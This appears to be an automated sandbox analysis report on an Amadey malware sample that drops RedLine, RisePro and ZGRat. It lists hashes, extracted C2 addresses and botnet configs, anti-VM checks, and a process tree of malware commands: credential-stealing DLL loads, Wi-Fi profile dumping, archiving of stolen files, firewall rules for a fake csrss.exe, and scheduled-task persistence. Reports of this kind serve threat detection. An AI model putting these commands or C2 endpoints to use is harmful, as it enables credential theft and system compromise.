amadey | a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7

Analysis

max time kernel
39s
max time network
147s
platform
windows11-21h2_x64
resource
win11-20240319-en
resource tags

arch:x64arch:x86image:win11-20240319-enlocale:en-usos:windows11-21h2-x64system
submitted
30-03-2024 18:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exe
Size

1.8MB
MD5

1cb7e3de5d7e1580d2f220179a296dce
SHA1

06575f15ad002512f215744a8ff65ccb88bbb57a
SHA256

a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7
SHA512

53e45fa355b948d127cb8fc145c193498363316ac71977b3e55c4ce983f2887bc20aa1e60f4dc019e4489a3f466f469b71e5db8c15fe6f9d8ff47a0a8be54005
SSDEEP

49152:iKvRwH5t+HhNasmiSKw+kODHcY6MUW/VeYvb:itCBNasvrkODv8q

Score

10^/10

amadey redline risepro zgrat @oleh_psp livetraffic evasion infostealer persistence rat stealer themida trojan

Malware Config

Extracted

Family

amadey

Version

4.17

http://185.215.113.32

Attributes

install_dir
00c07260dc
install_file
explorgu.exe
strings_key
461809bd97c251ba0c0c8450c7055f1d
url_paths
/yandex/index.php

rc4.plain

Extracted

Family

redline

Botnet

@OLEH_PSP

185.172.128.33:8970

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

install_dir
09fd851a4f
install_file
explorha.exe
strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

4.185.137.132:1632

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 28 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe	family_zgrat_v1
behavioral2/memory/6060-69-0x0000000000F80000-0x000000000113C000-memory.dmp	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe	family_zgrat_v1
behavioral2/memory/5560-395-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-396-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-398-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-400-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-402-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-414-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-418-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-425-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-429-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-431-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-433-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-435-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-437-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-439-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-441-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-445-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-448-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-453-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-457-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-455-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-462-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-466-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-470-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1
behavioral2/memory/5560-477-0x0000000005960000-0x0000000005B9C000-memory.dmp	family_zgrat_v1

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 7 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe	family_redline
behavioral2/memory/3232-104-0x0000000000440000-0x0000000000492000-memory.dmp	family_redline
behavioral2/memory/488-111-0x0000000000C60000-0x0000000000CEC000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe	family_redline
behavioral2/memory/2956-278-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exeexplorgu.exerandom.exeamadka.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorgu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amadka.exe

Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 3 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exe

pid process

6700 netsh.exe
6980 netsh.exe
4040 netsh.exe

pid	process
6700	netsh.exe
6980	netsh.exe
4040	netsh.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

random.exeamadka.exea497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exeexplorgu.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amadka.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amadka.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorgu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorgu.exe

Executes dropped EXE 6 IoCs

Processes:

explorgu.exerandom.exealex1234.exepropro.exeTraffic.exeamadka.exe

pid process

864 explorgu.exe
4312 random.exe
6060 alex1234.exe
3232 propro.exe
488 Traffic.exe
3108 amadka.exe

pid	process
864	explorgu.exe
4312	random.exe
6060	alex1234.exe
3232	propro.exe
488	Traffic.exe
3108	amadka.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exeexplorgu.exerandom.exeamadka.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1233663403-1277323514-675434005-1000\Software\Wine	a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exe
Key opened	\REGISTRY\USER\S-1-5-21-1233663403-1277323514-675434005-1000\Software\Wine	explorgu.exe
Key opened	\REGISTRY\USER\S-1-5-21-1233663403-1277323514-675434005-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-1233663403-1277323514-675434005-1000\Software\Wine	amadka.exe

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\ZHlUB29eC3nlTN6shTXVLnct.exe	themida

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorgu.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1233663403-1277323514-675434005-1000\Software\Microsoft\Windows\CurrentVersion\Run\random.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000873001\\random.exe"	explorgu.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1233663403-1277323514-675434005-1000\Software\Microsoft\Windows\CurrentVersion\Run\amadka.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1001031001\\amadka.exe"	explorgu.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

8 pastebin.com
24 pastebin.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

69 ipinfo.io
45 api.myip.com
45 ipinfo.io
68 api.myip.com
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exeexplorgu.exeamadka.exe

pid process

364 a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exe
864 explorgu.exe
3108 amadka.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

alex1234.exe

description pid process target process

PID 6060 set thread context of 3456 6060 alex1234.exe RegAsm.exe

flow	ioc
8	pastebin.com
24	pastebin.com

flow	ioc
69	ipinfo.io
45	api.myip.com
45	ipinfo.io
68	api.myip.com

description	pid	process	target process
PID 6060 set thread context of 3456	6060	alex1234.exe	RegAsm.exe

Drops file in Windows directory 2 IoCs

Processes:

a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exeamadka.exe

description	ioc	process
File created	C:\Windows\Tasks\explorgu.job	a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exe
File created	C:\Windows\Tasks\explorha.job	amadka.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

5632 4680 WerFault.exe koooooo.exe
984 4864 WerFault.exe ERWhJnjdUBAWd4EVMW8iCIHN.exe
792 808 WerFault.exe u3r4.0.exe
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3404 schtasks.exe
6196 schtasks.exe
6260 schtasks.exe
1284 schtasks.exe
4876 schtasks.exe

pid	pid_target	process	target process
5632	4680	WerFault.exe	koooooo.exe
984	4864	WerFault.exe	ERWhJnjdUBAWd4EVMW8iCIHN.exe
792	808	WerFault.exe	u3r4.0.exe

pid	process
3404	schtasks.exe
6196	schtasks.exe
6260	schtasks.exe
1284	schtasks.exe
4876	schtasks.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

propro.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	propro.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	propro.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1868 PING.EXE

pid	process
1868	PING.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exeexplorgu.exeamadka.exe

pid	process
364	a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exe
364	a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exe
864	explorgu.exe
864	explorgu.exe
3108	amadka.exe
3108	amadka.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

Traffic.exe

description	pid	process
Token: SeDebugPrivilege	488	Traffic.exe
Token: SeBackupPrivilege	488	Traffic.exe
Token: SeSecurityPrivilege	488	Traffic.exe
Token: SeSecurityPrivilege	488	Traffic.exe
Token: SeSecurityPrivilege	488	Traffic.exe
Token: SeSecurityPrivilege	488	Traffic.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exe

pid process

364 a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

explorgu.exealex1234.exeRegAsm.exe

description	pid	process	target process
PID 864 wrote to memory of 4312	864	explorgu.exe	random.exe
PID 864 wrote to memory of 4312	864	explorgu.exe	random.exe
PID 864 wrote to memory of 4312	864	explorgu.exe	random.exe
PID 864 wrote to memory of 6060	864	explorgu.exe	alex1234.exe
PID 864 wrote to memory of 6060	864	explorgu.exe	alex1234.exe
PID 864 wrote to memory of 6060	864	explorgu.exe	alex1234.exe
PID 6060 wrote to memory of 3456	6060	alex1234.exe	RegAsm.exe
PID 6060 wrote to memory of 3456	6060	alex1234.exe	RegAsm.exe
PID 6060 wrote to memory of 3456	6060	alex1234.exe	RegAsm.exe
PID 6060 wrote to memory of 3456	6060	alex1234.exe	RegAsm.exe
PID 6060 wrote to memory of 3456	6060	alex1234.exe	RegAsm.exe
PID 6060 wrote to memory of 3456	6060	alex1234.exe	RegAsm.exe
PID 6060 wrote to memory of 3456	6060	alex1234.exe	RegAsm.exe
PID 6060 wrote to memory of 3456	6060	alex1234.exe	RegAsm.exe
PID 3456 wrote to memory of 3232	3456	RegAsm.exe	propro.exe
PID 3456 wrote to memory of 3232	3456	RegAsm.exe	propro.exe
PID 3456 wrote to memory of 3232	3456	RegAsm.exe	propro.exe
PID 3456 wrote to memory of 488	3456	RegAsm.exe	Traffic.exe
PID 3456 wrote to memory of 488	3456	RegAsm.exe	Traffic.exe
PID 864 wrote to memory of 3108	864	explorgu.exe	amadka.exe
PID 864 wrote to memory of 3108	864	explorgu.exe	amadka.exe
PID 864 wrote to memory of 3108	864	explorgu.exe	amadka.exe

C:\Users\Admin\AppData\Local\Temp\a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exe
"C:\Users\Admin\AppData\Local\Temp\a497f3924d9c99814f3a1aeb4d01437bac4ca4f5410becae392d12c4bac2d4e7.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:364

C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:864

C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe
"C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
PID:4312

C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe
"C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:6060

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:3456

C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3232

C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:488

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
4⤵
PID:4892

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:4800

C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe
"C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:3108

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
3⤵
PID:5492

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
4⤵
PID:3892

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
5⤵
PID:668

C:\Windows\system32\netsh.exe
netsh wlan show profiles
6⤵
PID:1564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\233663403127_Desktop.zip' -CompressionLevel Optimal
6⤵
PID:5288

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
4⤵
PID:1736

C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe
"C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe"
2⤵
PID:2692

C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe
"C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe"
2⤵
PID:5956

C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe
"C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe"
2⤵
PID:1744

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2956

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe"
2⤵
PID:4884

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe" /F
3⤵
- Creates scheduled task(s)
PID:3404

C:\Users\Admin\AppData\Local\Temp\1000183001\Uni400uni.exe
"C:\Users\Admin\AppData\Local\Temp\1000183001\Uni400uni.exe"
3⤵
PID:1156

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
4⤵
PID:4732

C:\Users\Admin\Pictures\ERWhJnjdUBAWd4EVMW8iCIHN.exe
"C:\Users\Admin\Pictures\ERWhJnjdUBAWd4EVMW8iCIHN.exe"
5⤵
PID:4864

C:\Users\Admin\AppData\Local\Temp\u3r4.0.exe
"C:\Users\Admin\AppData\Local\Temp\u3r4.0.exe"
6⤵
PID:808

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JJKJDAEBFC.exe"
7⤵
PID:1580

C:\Users\Admin\AppData\Local\Temp\JJKJDAEBFC.exe
"C:\Users\Admin\AppData\Local\Temp\JJKJDAEBFC.exe"
8⤵
PID:3804

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\JJKJDAEBFC.exe
9⤵
PID:1800

C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
10⤵
- Runs ping.exe
PID:1868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 808 -s 2500
7⤵
- Program crash
PID:792

C:\Users\Admin\AppData\Local\Temp\u3r4.1.exe
"C:\Users\Admin\AppData\Local\Temp\u3r4.1.exe"
6⤵
PID:816

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
7⤵
PID:3000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 984
6⤵
- Program crash
PID:984

C:\Users\Admin\Pictures\rSqX9vbagkFTnjTAKq14RLlC.exe
"C:\Users\Admin\Pictures\rSqX9vbagkFTnjTAKq14RLlC.exe"
5⤵
PID:3076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:2996

C:\Users\Admin\Pictures\rSqX9vbagkFTnjTAKq14RLlC.exe
"C:\Users\Admin\Pictures\rSqX9vbagkFTnjTAKq14RLlC.exe"
6⤵
PID:6904

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:2508

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
7⤵
PID:1144

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
8⤵
- Modifies Windows Firewall
PID:6700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:5384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:3764

C:\Users\Admin\Pictures\94eW9q3fxzD1oOwsSoTX5YVs.exe
"C:\Users\Admin\Pictures\94eW9q3fxzD1oOwsSoTX5YVs.exe"
5⤵
PID:2668

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:4040

C:\Users\Admin\Pictures\94eW9q3fxzD1oOwsSoTX5YVs.exe
"C:\Users\Admin\Pictures\94eW9q3fxzD1oOwsSoTX5YVs.exe"
6⤵
PID:6956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:1428

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
7⤵
PID:3692

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
8⤵
- Modifies Windows Firewall
PID:6980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:6076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:6540

C:\Users\Admin\Pictures\s0HVOda0ww90MGSePvM7CEwH.exe
"C:\Users\Admin\Pictures\s0HVOda0ww90MGSePvM7CEwH.exe"
5⤵
PID:1176

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
PID:2988

C:\Users\Admin\Pictures\s0HVOda0ww90MGSePvM7CEwH.exe
"C:\Users\Admin\Pictures\s0HVOda0ww90MGSePvM7CEwH.exe"
6⤵
PID:7060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:6604

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
7⤵
PID:5760

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
8⤵
- Modifies Windows Firewall
PID:4040

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:5160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
7⤵
PID:452

C:\Users\Admin\Pictures\rLV68tuuMOnkC9xdW6Ch5Ev5.exe
"C:\Users\Admin\Pictures\rLV68tuuMOnkC9xdW6Ch5Ev5.exe"
5⤵
PID:4812

C:\Users\Admin\AppData\Local\Temp\7zSEAC8.tmp\Install.exe
.\Install.exe
6⤵
PID:3452

C:\Users\Admin\AppData\Local\Temp\7zS555.tmp\Install.exe
.\Install.exe /IfvkdidQBhF "385118" /S
7⤵
PID:4452

C:\Windows\SysWOW64\forfiles.exe
